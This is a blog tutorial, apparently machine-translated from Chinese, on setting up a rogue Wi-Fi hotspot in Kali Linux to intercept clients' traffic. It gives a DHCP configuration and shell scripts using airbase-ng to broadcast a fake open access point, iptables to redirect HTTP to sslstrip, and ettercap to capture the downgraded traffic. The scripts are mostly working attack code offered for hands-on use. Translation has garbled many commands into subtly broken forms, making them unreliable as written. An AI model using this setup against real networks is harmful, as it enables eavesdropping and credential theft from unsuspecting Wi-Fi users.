Kali Linux set up fishing hotspots

Main content : Refer to a number of articles on the web, the success of their own hands-on experiment, here in detail to record their own under the Kali Linux build

Process, this article focuses on hands-on implementation, does not involve the principle, about the principle should be in the following separate article to explore in detail

Lab Environment:

Host hosts: Windows 8 64-bit

Virtual machine Software:

VirtualBox 4.3.8 (requires installation of the same 4.3.8 version expansion pack and enhanced Feature Pack, which is two different

Package! Install the enhancement package need to install the appropriate kernel header files and the compilation environment, here not to do more introduction)

Virtual machine: Kali Linux1.08, i386 (Install the system please search the corresponding tutorial)

USB Wireless Card Ralink RT2870 chip (kali with driver, if you need to install network card driver, please search and solve by yourself)

Note that it is not possible to complete this experiment in a virtual machine if it is a laptop-only wireless card , The Notebook

Your own wireless card is not assigned to a virtual machine as a USB device . , it must be a USB wireless card

Start the Kali Linux virtual machine, assign the wireless card to the virtual machine in the upper left-hand corner of the device-〉 assign a USB device

Build the actual fishing AP Environment:

General thinking and configuration:

The Kali has an Ethernet card eth0 (select Network address translation (NAT) in the network configuration of the virtual machine to make

Kali virtual machine via WINDOWS8 physical host), this is Kali connected to the Internet, and connected to our

The client of the phishing AP will also connect to the Internet via this interface. The actual purpose of our goal is to monitor the client's data traffic.

Our APS use DHCP to automatically assign IP addresses to connect clients. The following is a simple configuration of the DHCP server:

Installation and configuration of DHCP

Note: The name of the DHCP package and the configuration file store directory are different from CentOS

①. Installing the DHCP3 Server Software: $sudo apt-get install Dhcp3-server

②. Configuring the DHCP3 service profile/etc/dhcp3/dhcpd.conf

#vi/etc/dhcp3/dhcpd.conf
authoritative;
Ddns-update-style none;
Ignore client-updates;
Default-lease-time 7200;
Max-lease-time 36000;
Option Domain-name "xx.cn"; Take a domain name, take any
Option Domain-name-servers 202.202.96.33, 202.202.96.34; These two are DNS servers, which can be filled by the ISP
Option routers 192.168.10.1; Default Gateway
Subnet 192.168.10.0 netmask 255.255.255.0 {//NET segment and mask
Range 192.168.10.10 192.168.10.120; Assigning ranges of IP addresses
}

③. Change the network card that the DHCP3 service listens on, can modify

/etc/default/dhcp3-server
interfaces= "At0"//DHCP server listening network interface, the article will talk about At0

Note: You need to assign an IP address for the monitoring network interface of the DHCP service and must make the address of the interface and the subnet provided by the DHCP

The DHCP service on the same network segment can be properly opened and configured so we don't start

We want to connect to the Internet via the Eth0 network card, so the data that our fishing APS come in need to be online via NAT. About

For more details on Linux firewall iptables and NAT, please refer to the information written by Brother Bird:

http://linux.vbird.org/linux_server/0250simple_firewall.php

Iptables.sh is the simple setup I wrote about Iptables and NAT, if you need a reference.

iptables.sh Content

#!/bin/bash
# #2014-08-19
# #fake AP Iptables Configure script
# #write by Netcake

#filter

#清除filter表的所有防火墙规则
Iptables-f
Iptables-x
Iptables-z

#设定filter表的3条链的默认 Action

Iptables-p INPUT DROP
Iptables-p OUTPUT ACCEPT
Iptables-p FORWARD ACCEPT

#信任本机回环端口lo

Iptables-a input-i lo-j ACCEPT

#信任由本机建立的链接

Iptables-a input-m state–state related,established-j ACCEPT

#开启Linux内核的封包转递功能, but this method fails after a reboot, if you want to fix the packet forwarding function,

#可以编辑/etc/sysctl.conf file to find
#
# net.ipv4.ip_forward=1

#

#一行, uncomment

echo "1" >/proc/sys/net/ipv4/ip_forward

#nat

#清除nat表的所有防火墙规则

Iptables-t nat-f
Iptables-t Nat-x
Iptables-t nat-z

#设定nat表的3条链的默认 action, you need to specify that the table name is NAT, and the default is filter if not specified

Iptables-t nat-p prerouting ACCEPT
Iptables-t nat-p OUTPUT ACCEPT
Iptables-t nat-p postrouting ACCEPT

#Internet access, turn on NAT

#这条指令是将所有来自192.168.10.0/24 network Segment (DHCP assigned to the IP address of the attached fishing AP) The number of out through the Eth0 interface

#据进行网络地址转换, replace the IP address of the data from the 192.168.10.0/24 network segment with the IP address of the Eth0 interface

Iptables-t nat-a postrouting-s 192.168.10.0/24-o eth0-j Masquerade

#listen on Local,redirect http Data,sslstrip listening port

#将所有目的端口为80的tcp数据镜像到本机端口10000
Iptables-t nat-a prerouting-p tcp--destination-port 80-j REDIRECT--to-port 10000

#iptables. SH footstep End

Ap.sh is a script that turns on fishing hotspots

ap.sh Content

#!/bin/bash

#实验过程中, I found that often the first time the AP turned on successfully, then sometimes success sometimes failed, and later observed that the failure
#虚拟机里面 Network-manager does not recognize the wireless card at this time, so first restart Network-manager identify the wireless network card
#后再开启AP, there is no question of open failure in the back.
#重新启动network-manager Identify the wireless card
/etc/init.d/network-manager restart
Sleep 4

#将无线网卡调整至监听模式

Ifconfig wlan0 Down
Iwconfig wlan0 Mode Monitor
Ifconfig wlan0 up

#启动无线网卡监听模式. A mon0 corresponding listening network virtual interface is generated.

#实际上此时mon0等同于waln0
Airmon-ng Start Wlan0
Sleep 3

#指定ssid为wifi and AP channels are 6, opening the Ap,airbase-ng command generates an ATX virtual network interface,

#在这里就是at0

AIRBASE-NG-E Wifi-c 6 Mon0

#ap. Sh End

at0.sh script sets the network parameters of the virtual network interface At0 and opens the DHCP service to listen for client requests on At0

at0.sh Content

#!/bin/bash

#启用at0虚拟网络接口

#配置ip为dhcp服务器配置文件中指定的网关ip (that is, option-routers in the DHCP configuration file)

#注意: The DHCP service's Listening network interface IP address must be on the same network segment as the DHCP-provided subnet
#设置mtu, it doesn't hurt to set it up.
Ifconfig at0 up
Ifconfig at0 192.168.10.1 netmask 255.255.255.0
Ifconfig At0 MTU 1500

#指定DHCP服务器使用的配置文件/etc/dhcp3/dhcpd.conf and PID files/var/run/dhcpd.pid

#还有监听的网络接口at0
Dhcpd-cf/etc/dhcp3/dhcpd.conf-pf/var/run/dhcpd.pid At0

#启动DHCP服务, note that any time you modify a DHCP server's configuration file, you must restart the DHCP service to take effect

/etc/init.d/isc-dhcp-server start

#at0. Sh End

Turn on SSLstrip, Ettercap Monitor

We have mirrored all TCP 80 port data to port 10000, and we just need to listen here.

#sslstrip-L 10000

Open another terminal and use Ettercap to display the SSL encrypted data you hear

#ettercap-TQI At0

Note: turning on ettercap causes the value of/proc/sys/net/ipv4/ip_forward to be 0, that is, the client disconnects and

Internet links, you need to manually modify the value of the/proc/sys/net/ipv4/ip_forward

#echo 1 >/proc/sys/net/ipv4/ip_forward

This article from "Small Fish" blog, declined reprint!

Kali Linux set up fishing hotspots